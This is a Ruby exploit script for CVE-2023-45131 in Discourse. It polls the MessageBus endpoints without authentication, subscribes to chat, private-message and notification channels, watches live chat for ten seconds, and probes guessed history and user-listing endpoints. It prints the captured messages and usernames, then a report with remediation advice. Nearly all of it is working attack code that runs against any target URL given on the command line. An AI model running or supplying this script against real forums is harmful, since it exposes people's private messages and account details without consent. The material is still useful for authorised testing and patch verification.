Discourse 3.1.1 - Unauthenticated Chat Message Access

#!/usr/bin/env ruby
# Title : Discourse 3.1.1 - Unauthenticated Chat Message Access
# CVE-2023-45131
# CVSS: 7.5 (High)
# Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2
# Author ibrahimsql @ https://twitter.com/ibrahmsql
# Date: 2023-12-14

require 'net/http'
require 'uri'
require 'json'
require 'openssl'
require 'base64'

class CVE202345131
  def initialize(target_url)
    @target_url = target_url.chomp('/')
    @results = []
    @message_bus_client_id = nil
    @csrf_token = nil
  end

  def run_exploit
    puts "\n[*] Testing CVE-2023-45131: Discourse Unauthenticated Chat Message Access"
    puts "[*] Target: #{@target_url}"
    puts "[*] CVSS Score: 7.5 (High)"
    puts "[*] Affected: Discourse < 3.1.1 stable, < 3.2.0.beta2\n"

    # Test MessageBus access
    test_messagebus_access
    test_chat_channel_enumeration
    test_private_message_access
    test_real_time_monitoring
    test_message_history_access
    test_user_enumeration_via_chat

    generate_report
    @results
  end

  private

  def test_messagebus_access
    puts "[*] Testing MessageBus unauthenticated access..."
    
    begin
      # Get MessageBus client ID
      uri = URI("#{@target_url}/message-bus/poll")
      
      response = make_request(uri, 'GET')
      
      if response && response.code == '200'
        begin
          data = JSON.parse(response.body)
          if data.is_a?(Array) && !data.empty?
            @message_bus_client_id = extract_client_id(response)
            
            @results << {
              vulnerability: "MessageBus Access",
              severity: "High",
              description: "Unauthenticated access to MessageBus endpoint confirmed",
              impact: "Can monitor real-time messages and notifications",
              client_id: @message_bus_client_id
            }
            puts "[+] MessageBus access confirmed - Client ID: #{@message_bus_client_id}"
            return true
          end
        rescue JSON::ParserError
          # Try alternative endpoints
          test_alternative_messagebus_endpoints
        end
      end
    rescue => e
      puts "[!] Error testing MessageBus access: #{e.message}"
    end
    
    false
  end

  def test_alternative_messagebus_endpoints
    puts "[*] Testing alternative MessageBus endpoints..."
    
    endpoints = [
      "/message-bus/poll",
      "/message-bus/subscribe",
      "/message-bus/diagnostics",
      "/message-bus/long-poll"
    ]

    endpoints.each do |endpoint|
      begin
        uri = URI("#{@target_url}#{endpoint}")
        response = make_request(uri, 'GET')
        
        if response && response.code == '200'
          if response.body.include?('message-bus') || response.body.include?('clientId')
            @results << {
              vulnerability: "Alternative MessageBus Endpoint",
              severity: "Medium",
              endpoint: endpoint,
              description: "Alternative MessageBus endpoint accessible",
              impact: "Potential message monitoring capability"
            }
            puts "[+] Alternative endpoint accessible: #{endpoint}"
          end
        end
      rescue => e
        puts "[!] Error testing endpoint #{endpoint}: #{e.message}"
      end
    end
  end

  def test_chat_channel_enumeration
    puts "[*] Testing chat channel enumeration..."
    
    return unless @message_bus_client_id
    
    begin
      # Try to enumerate chat channels
      uri = URI("#{@target_url}/message-bus/poll")
      
      # Subscribe to chat channels
      data = {
        '/chat/new-messages' => -1,
        '/chat/channel-status' => -1,
        '/chat/user-tracking' => -1,
        'clientId' => @message_bus_client_id
      }
      
      response = make_request(uri, 'POST', data)
      
      if response && response.code == '200'
        begin
          messages = JSON.parse(response.body)
          
          if messages.is_a?(Array) && !messages.empty?
            chat_channels = extract_chat_channels(messages)
            
            if !chat_channels.empty?
              @results << {
                vulnerability: "Chat Channel Enumeration",
                severity: "High",
                channels: chat_channels,
                description: "Enumerated accessible chat channels",
                impact: "Can identify active chat channels and participants"
              }
              puts "[+] Chat channels enumerated: #{chat_channels.join(', ')}"
            end
          end
        rescue JSON::ParserError => e
          puts "[!] Error parsing chat channel response: #{e.message}"
        end
      end
    rescue => e
      puts "[!] Error enumerating chat channels: #{e.message}"
    end
  end

  def test_private_message_access
    puts "[*] Testing private message access..."
    
    return unless @message_bus_client_id
    
    begin
      # Try to access private messages
      uri = URI("#{@target_url}/message-bus/poll")
      
      # Subscribe to private message channels
      data = {
        '/private-messages' => -1,
        '/chat/private' => -1,
        '/notification' => -1,
        'clientId' => @message_bus_client_id
      }
      
      response = make_request(uri, 'POST', data)
      
      if response && response.code == '200'
        begin
          messages = JSON.parse(response.body)
          
          if messages.is_a?(Array)
            private_messages = extract_private_messages(messages)
            
            if !private_messages.empty?
              @results << {
                vulnerability: "Private Message Access",
                severity: "Critical",
                messages: private_messages,
                description: "Accessed private chat messages without authentication",
                impact: "Complete breach of private communication confidentiality"
              }
              puts "[+] Private messages accessed: #{private_messages.length} messages found"
              
              # Log sample messages (redacted)
              private_messages.first(3).each_with_index do |msg, idx|
                puts "    [#{idx + 1}] #{redact_message(msg)}"
              end
            end
          end
        rescue JSON::ParserError => e
          puts "[!] Error parsing private message response: #{e.message}"
        end
      end
    rescue => e
      puts "[!] Error accessing private messages: #{e.message}"
    end
  end

  def test_real_time_monitoring
    puts "[*] Testing real-time message monitoring..."
    
    return unless @message_bus_client_id
    
    begin
      puts "[*] Monitoring for 10 seconds..."
      
      start_time = Time.now
      monitored_messages = []
      
      while (Time.now - start_time) < 10
        uri = URI("#{@target_url}/message-bus/poll")
        
        data = {
          '/chat/new-messages' => 0,
          'clientId' => @message_bus_client_id
        }
        
        response = make_request(uri, 'POST', data)
        
        if response && response.code == '200'
          begin
            messages = JSON.parse(response.body)
            
            if messages.is_a?(Array) && !messages.empty?
              new_messages = extract_new_messages(messages)
              monitored_messages.concat(new_messages)
            end
          rescue JSON::ParserError
            # Continue monitoring
          end
        end
        
        sleep(1)
      end
      
      if !monitored_messages.empty?
        @results << {
          vulnerability: "Real-time Message Monitoring",
          severity: "High",
          messages_count: monitored_messages.length,
          description: "Successfully monitored real-time chat messages",
          impact: "Can intercept live communications"
        }
        puts "[+] Real-time monitoring successful: #{monitored_messages.length} messages intercepted"
      else
        puts "[-] No real-time messages detected during monitoring period"
      end
    rescue => e
      puts "[!] Error during real-time monitoring: #{e.message}"
    end
  end

  def test_message_history_access
    puts "[*] Testing message history access..."
    
    begin
      # Try to access message history through various endpoints
      history_endpoints = [
        "/chat/api/channels",
        "/chat/api/messages",
        "/chat/history",
        "/api/chat/channels.json"
      ]
      
      history_endpoints.each do |endpoint|
        uri = URI("#{@target_url}#{endpoint}")
        response = make_request(uri, 'GET')
        
        if response && response.code == '200'
          begin
            data = JSON.parse(response.body)
            
            if data.is_a?(Hash) && (data['messages'] || data['channels'] || data['chat'])
              @results << {
                vulnerability: "Message History Access",
                severity: "High",
                endpoint: endpoint,
                description: "Accessed chat message history without authentication",
                impact: "Historical chat data exposure"
              }
              puts "[+] Message history accessible via: #{endpoint}"
            end
          rescue JSON::ParserError
            # Check for HTML responses that might contain chat data
            if response.body.include?('chat') && response.body.include?('message')
              @results << {
                vulnerability: "Message History Exposure",
                severity: "Medium",
                endpoint: endpoint,
                description: "Chat-related content found in response",
                impact: "Potential information disclosure"
              }
              puts "[+] Chat-related content found in: #{endpoint}"
            end
          end
        end
      end
    rescue => e
      puts "[!] Error testing message history access: #{e.message}"
    end
  end

  def test_user_enumeration_via_chat
    puts "[*] Testing user enumeration via chat features..."
    
    begin
      # Try to enumerate users through chat-related endpoints
      user_endpoints = [
        "/chat/api/users",
        "/chat/users.json",
        "/api/chat/users",
        "/chat/members"
      ]
      
      user_endpoints.each do |endpoint|
        uri = URI("#{@target_url}#{endpoint}")
        response = make_request(uri, 'GET')
        
        if response && response.code == '200'
          begin
            data = JSON.parse(response.body)
            
            if data.is_a?(Hash) && (data['users'] || data['members'])
              users = extract_users_from_chat(data)
              
              if !users.empty?
                @results << {
                  vulnerability: "User Enumeration via Chat",
                  severity: "Medium",
                  endpoint: endpoint,
                  users_count: users.length,
                  sample_users: users.first(5),
                  description: "Enumerated chat users without authentication",
                  impact: "User information disclosure"
                }
                puts "[+] Users enumerated via #{endpoint}: #{users.length} users found"
              end
            end
          rescue JSON::ParserError
            # Continue with next endpoint
          end
        end
      end
    rescue => e
      puts "[!] Error testing user enumeration: #{e.message}"
    end
  end

  def extract_client_id(response)
    # Extract client ID from response headers or body
    if response['X-MessageBus-Client-Id']
      return response['X-MessageBus-Client-Id']
    end
    
    # Try to extract from response body
    begin
      data = JSON.parse(response.body)
      if data.is_a?(Hash) && data['clientId']
        return data['clientId']
      end
    rescue JSON::ParserError
    end
    
    # Generate a random client ID
    SecureRandom.hex(16)
  end

  def extract_chat_channels(messages)
    channels = []
    
    messages.each do |message|
      if message.is_a?(Hash)
        if message['channel'] && message['channel'].include?('/chat/')
          channels << message['channel']
        elsif message['data'] && message['data'].is_a?(Hash)
          if message['data']['channel_id']
            channels << "Channel #{message['data']['channel_id']}"
          end
        end
      end
    end
    
    channels.uniq
  end

  def extract_private_messages(messages)
    private_msgs = []
    
    messages.each do |message|
      if message.is_a?(Hash)
        if message['channel'] && (message['channel'].include?('/private') || message['channel'].include?('/chat/private'))
          private_msgs << {
            channel: message['channel'],
            data: message['data'],
            timestamp: message['timestamp'] || Time.now.to_i
          }
        elsif message['data'] && message['data'].is_a?(Hash)
          if message['data']['message'] || message['data']['content']
            private_msgs << {
              content: message['data']['message'] || message['data']['content'],
              user: message['data']['user'] || message['data']['username'],
              timestamp: message['data']['timestamp'] || Time.now.to_i
            }
          end
        end
      end
    end
    
    private_msgs
  end

  def extract_new_messages(messages)
    new_msgs = []
    
    messages.each do |message|
      if message.is_a?(Hash) && message['data']
        new_msgs << {
          channel: message['channel'],
          data: message['data'],
          timestamp: Time.now.to_i
        }
      end
    end
    
    new_msgs
  end

  def extract_users_from_chat(data)
    users = []
    
    if data['users'] && data['users'].is_a?(Array)
      data['users'].each do |user|
        if user.is_a?(Hash)
          users << {
            username: user['username'],
            id: user['id'],
            name: user['name']
          }
        end
      end
    elsif data['members'] && data['members'].is_a?(Array)
      data['members'].each do |member|
        if member.is_a?(Hash)
          users << {
            username: member['username'] || member['user'],
            id: member['id'] || member['user_id']
          }
        end
      end
    end
    
    users
  end

  def redact_message(message)
    if message.is_a?(Hash)
      content = message[:content] || message['content'] || message[:data] || 'N/A'
      user = message[:user] || message['user'] || 'Unknown'
      "User: #{user}, Content: #{content.to_s[0..50]}..."
    else
      message.to_s[0..50] + "..."
    end
  end

  def make_request(uri, method = 'GET', data = nil, headers = {})
    begin
      http = Net::HTTP.new(uri.host, uri.port)
      http.use_ssl = (uri.scheme == 'https')
      http.verify_mode = OpenSSL::SSL::VERIFY_NONE if http.use_ssl?
      http.read_timeout = 10
      http.open_timeout = 10

      request = case method.upcase
                when 'GET'
                  Net::HTTP::Get.new(uri.request_uri)
                when 'POST'
                  req = Net::HTTP::Post.new(uri.request_uri)
                  if data
                    if data.is_a?(Hash)
                      req.set_form_data(data)
                    else
                      req.body = data
                      req['Content-Type'] = 'application/json'
                    end
                  end
                  req
                end

      # Set headers
      request['User-Agent'] = 'Mozilla/5.0 (compatible; DiscourseMap/2.0)'
      request['Accept'] = 'application/json, text/javascript, */*; q=0.01'
      request['X-Requested-With'] = 'XMLHttpRequest'
      headers.each { |key, value| request[key] = value }

      response = http.request(request)
      return response
    rescue => e
      puts "[!] Request failed: #{e.message}"
      return nil
    end
  end

  def generate_report
    puts "\n" + "="*60
    puts "CVE-2023-45131 Exploitation Report"
    puts "="*60
    puts "Target: #{@target_url}"
    puts "Vulnerabilities Found: #{@results.length}"
    
    if @results.empty?
      puts "[+] No chat message access vulnerabilities detected"
    else
      puts "\n[!] VULNERABILITIES DETECTED:"
      @results.each_with_index do |result, index|
        puts "\n#{index + 1}. #{result[:vulnerability]}"
        puts "   Severity: #{result[:severity]}"
        puts "   Description: #{result[:description]}"
        puts "   Impact: #{result[:impact]}"
        
        if result[:messages_count]
          puts "   Messages Found: #{result[:messages_count]}"
        end
        if result[:channels]
          puts "   Channels: #{result[:channels].join(', ')}"
        end
        if result[:endpoint]
          puts "   Endpoint: #{result[:endpoint]}"
        end
      end
      
      puts "\n[!] REMEDIATION:"
      puts "1. Update Discourse to version 3.1.1 stable or 3.2.0.beta2 or later"
      puts "2. Implement proper authentication for MessageBus endpoints"
      puts "3. Review and restrict access to chat-related APIs"
      puts "4. Monitor MessageBus access logs for suspicious activity"
      puts "5. Consider disabling chat features if not required"
    end
    
    puts "\n" + "="*60
  end
end

# Run the exploit if called directly
if __FILE__ == $0
  if ARGV.length != 1
    puts "Usage: ruby #{$0} <target_url>"
    puts "Example: ruby #{$0} https://discourse.example.com"
    exit 1
  end

  target_url = ARGV[0]
  exploit = CVE202345131.new(target_url)
  exploit.run_exploit
end